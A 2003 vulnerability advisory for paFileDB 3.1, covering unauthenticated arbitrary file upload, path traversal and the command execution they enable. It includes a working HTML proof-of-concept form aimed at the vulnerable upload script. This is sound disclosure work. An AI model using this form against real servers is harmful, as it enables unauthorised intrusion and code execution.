Home  Services  Contact  Projects  Whitepapers  Tools  Partners 



============================
Security REPORT paFileDB 3.1
============================

Product: paFileDB Version 3.1 (and earlier)
Vulnerablities: arbitrary file-upload, path-traversal, arbitrary OS command-execution
Vuln.-classes: http://www.owasp.org/asac/parameter_manipulation/forms.shtml
http://www.owasp.org/asac/input_validation/os.shtml
http://www.owasp.org/asac/input_validation/pt.shtml
Vendor: php arena (http://www.phparena.net/)
Vendor-Status: contacted thru mailform (http://www.phparena.net/mail.php) 26.06.2003
Vendor-Patch: http://forums.phparena.net/index.php?act=ST&f=26&t=2170

Exploitable:
Local: NO
Remote: YES

============
Introduction
============

(taken from website)
---*---
paFileDB is designed to allow webmasters have a database of files for download on their site. To add a download, all you do is upload the file using FTP or whatever method you use, log into paFileDB's admin center, and fill out a form to add a file.
---*---


=====================
Vulnerability Details
=====================


1) ARBITRARY FILE UPLOAD
========================

the script "/includes/team/file.php" (and maybe others) does not check for a valid session.
therefore it is possible to upload arbitrary files by creating/modifying a single form-parameter.

Form-example:
---*---
<html><body>
<form ENCTYPE="multipart/form-data" method="POST" action="http://srv/pafiledb/includes/team/file.php">
<input name="userfile" TYPE="file"><br>
<input name="userfile_name" TYPE="text" value="../../../uploads/makeawish"><br>
<input type="hidden" name="action" value="team">
<input type="hidden" name="tm" value="file">
<input type="hidden" name="file" value="upload">
<input type="hidden" name="upload" value="do">
<input type=submit name=submit value="doit">
</form>
</body></html>
---*---

2) ARBITRARY OS-COMMAND EXECUTION
=================================

by uploading program- or script-files.



Severity: HIGH


=======
Remarks
=======

---

====================
Recommended Hotfixes
====================

software patch.


EOF Martin Eiszner / @2003WebSec.org


=======
Contact
=======

WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna

Austria / EUROPE

mei@websec.org
http://www.websec.org

Home  Services  Contact  Projects  Whitepapers  Tools  Partners